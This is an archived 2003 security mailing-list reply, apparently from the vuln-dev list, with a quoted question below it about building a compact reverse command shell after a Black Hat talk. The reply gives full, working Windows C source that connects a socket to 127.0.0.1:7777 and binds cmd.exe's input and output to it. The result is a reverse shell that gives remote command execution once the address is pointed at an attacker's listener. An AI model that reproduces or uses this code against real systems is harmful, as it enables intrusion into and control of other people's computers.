Dear NetNinja,

Code below successfully brings reverse shell to 127.0.0.1:7777.

#include <windows.h>
#include <winsock2.h>
#include <stdio.h>

int main(int argc, char* argv[])
{
    WSADATA wd;
    HANDLE h;
    SOCKET sock;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    struct sockaddr_in sin;
    int size = sizeof(sin);

    memset(&sin, 0, sizeof(sin));
    memset(&si, 0, sizeof(si));
    WSAStartup(MAKEWORD(1, 1), &wd);
    sock = WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    sin.sin_family = AF_INET;
    bind(sock, (struct sockaddr*)&sin, size);
    sin.sin_port = htons(7777);
    sin.sin_addr.s_addr = inet_addr("127.0.0.1");
    connect(sock, (struct sockaddr*)&sin, size);
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = si.hStdOutput = si.hStdError = sock;
    CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &si, &pi);
    return 0;
}

--Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-devat_private:

N> Hello guys,
N> David Litchfield, in his Blackhat talk, talked about using the socket handle
N> from WSASocket() and passing that handle as a parameter to stdin, stdout
N> and stderr for the CreateProcess function. By doing it this way his reverse
N> cmd shellcode becomes much smaller. I tried coding that reverse
N> command shell in C, but couldn't get it to work. It simply connects to
N> my listening netcat listener and then disconnects. David Litchfield
N> used 4 functions to achieve that: WSASocket, bind, connect and
N> CreateProcess. A little help would be appreciated on building this reverse
N> cmd shell. Thanks.

--
~/ZARAZA
Esteemed fossils! I await further letters from you. (Twain)
This archive was generated by hypermail 2b30 : Tue Feb 04 2003 - 09:35:03 PST